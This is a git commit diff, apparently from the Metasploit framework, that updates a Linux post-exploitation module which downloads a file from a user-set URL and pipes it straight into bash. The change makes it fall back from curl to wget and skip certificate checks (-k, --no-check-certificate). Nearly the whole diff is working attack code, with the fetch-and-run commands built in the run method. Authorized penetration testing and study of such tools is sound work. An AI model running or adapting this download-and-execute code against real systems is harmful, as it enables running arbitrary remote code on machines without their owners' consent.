bug/bundler_fix
jvazquez-r7 2013-03-21 17:10:58 +01:00
commit 4f0be52a0d
1 changed files with 43 additions and 21 deletions

View File

@ -18,12 +18,13 @@ class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Download Exec',
'Name' => 'Linux Manage Download and Exececute',
'Description' => %q{
This module downloads and runs a file with bash. It uses curl and bash from the PATH.
This module downloads and runs a file with bash. It first tries to uses curl as
its HTTP client and then wget if it's not found. Bash found in the PATH is used to
execute the file.
},
'License' => MSF_LICENSE,
'Author' =>
@ -41,8 +42,17 @@ class Metasploit3 < Msf::Post
end
def cmd_exec_vprint(cmd)
vprint_status("Executing: #{cmd}")
output = cmd_exec(cmd)
if output.length > 0
vprint_status("#{output}")
end
return
end
def exists_exe?(exe)
path = expand_path("$PATH")
path = expand_path(ENV['PATH'])
if path.nil? or path.empty?
return false
end
@ -54,28 +64,40 @@ class Metasploit3 < Msf::Post
return false
end
def run
def search_http_client
print_status("Checking if curl exists in the path...")
if exists_exe?("curl")
print_good("curl available, going ahead...")
else
print_warning("curl not available on the $PATH, aborting...")
print_good("curl available, using it")
@stdout_option = ""
@http_client = "curl"
@ssl_option = "-k"
return
end
print_status("Checking if wget exists in the path...")
if exists_exe?("wget")
print_good("wget available, using it")
@http_client = "wget"
@stdout_option = "-O-"
@ssl_option = "--no-check-certificate"
return
end
end
def run
search_http_client
if not @http_client
print_warning("neither curl nor wget available in the $PATH, aborting...")
return
end
if datastore['URL'].match(/https/)
cmd_exec_vprint("`which curl` -k #{datastore['URL']} 2>/dev/null | `which bash` ")
cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
else
cmd_exec_vprint("`which curl` #{datastore['URL']} 2>/dev/null | `which bash` ")
cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
end
end
def cmd_exec_vprint(cmd)
vprint_status("Executing: #{cmd}")
output = cmd_exec(cmd)
if output.length > 0
vprint_status("#{output}")
end
return
end
end